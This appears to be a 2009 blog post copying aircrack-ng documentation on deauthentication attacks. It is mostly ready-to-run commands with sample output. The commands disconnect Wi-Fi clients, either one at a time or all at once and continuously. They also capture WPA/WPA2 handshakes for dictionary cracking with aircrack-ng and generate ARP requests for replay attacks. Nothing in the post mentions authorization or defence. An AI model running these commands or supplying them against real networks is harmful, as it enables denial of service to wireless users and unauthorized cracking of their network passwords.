Deauthentication Using Aireplay-ng
June 21st, 2009This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons
- Recovering a hidden ESSID. This is an ESSID which is not being broadcast.
- Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
- Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless client or on a fake authentications.
Usage
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
-0 means deauthentication
1 is the number of deauths to send (you can send muliple if you wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
ath0 is the interface name
Usage Examples
Typical Deauthentication
First, you determine a client which is currently connected. You need the MAC address for the following command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
-0 means deauthentication
1 is the number of deauths to send (you can send muliple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing
ath0 is the interface name
Here is what the ouput looks like:
11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]
WPA/WPA2 Handshake capture with an Atheros
airmon-ng start ath0
airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
(switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
Here the explaination of the above commands:
airodump-ng -c 6 –-bssid 00:14:6C:7E:40:80 -w out ath0
Where:
-c 6 is the channel to listen on
–bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
-w out is the file prefix of the file name to be written
ath0 is the interface name
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
-0 means deauthentication attack
5 is number of groups of deauthentication packets to send out
-a 00:14:6C:7E:40:80 is MAC address of the access point
-c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated
ath0 is the interface name
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56
Sending DeAuth to station
– STMAC: [00:0F:B5:AB:CB:9D]
12:55:56
Sending DeAuth to station
– STMAC: [00:0F:B5:AB:CB:9D]
12:55:57
Sending DeAuth to station
– STMAC: [00:0F:B5:AB:CB:9D]
12:55:58
Sending DeAuth to station
– STMAC: [00:0F:B5:AB:CB:9D]
12:55:58
Sending DeAuth to station
– STMAC: [00:0F:B5:AB:CB:9D]
ARP request generation with a Prism2 card
airmon-ng start wlan0
airodump-ng -c 6 -w out –bssid 00:13:10:30:24:9C wlan0
(switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.